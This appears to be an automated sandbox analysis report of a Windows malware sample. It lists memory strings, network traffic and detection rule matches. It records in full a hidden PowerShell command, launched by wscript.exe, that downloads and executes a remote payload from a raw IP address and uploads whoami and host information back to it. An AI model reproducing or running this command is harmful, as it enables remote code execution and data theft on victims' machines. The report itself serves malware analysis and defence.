Source: |
Binary string: ystem.Core.pdbz source: powershell.exe, 0000000E.00000002.3044779615.0000020A42327000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbCore.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000E.00000002.2976704530.0000020A2833C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: *.pdb\ source: powershell.exe, 0000000E.00000002.3043497362.0000020A42291000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: icrosoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp |
String found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument Target"word/document.xml/> |
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp |
String found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocume |
Source: global traffic |
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 147.78.46.40 |
Source: global traffic |
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662 |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B4F2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662( |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B7BF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662/xsSpQbS |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B510000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662/xsSpQbSP |
Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:37662P |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://147.78.46.40:43891/page164 |
Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoftK8 |
Source: svchost.exe, 0000000A.00000002.3430811641.0000023B7188B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2397944415.0000023E4ABBF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.openxmlfo |
Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.mcrosoft.com |
Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B7159E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/Prod1C: |
Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C: |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2AB3F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);} |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 0_2_00007FFD3479394D |
0_2_00007FFD3479394D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD343354A0 |
14_2_00007FFD343354A0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD3433249D |
14_2_00007FFD3433249D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD34334099 |
14_2_00007FFD34334099 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD34333DFA |
14_2_00007FFD34333DFA |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD34333B67 |
14_2_00007FFD34333B67 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD34336365 |
14_2_00007FFD34336365 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD34335B7F |
14_2_00007FFD34335B7F |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 14_2_00007FFD3440091E |
14_2_00007FFD3440091E |
Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03 |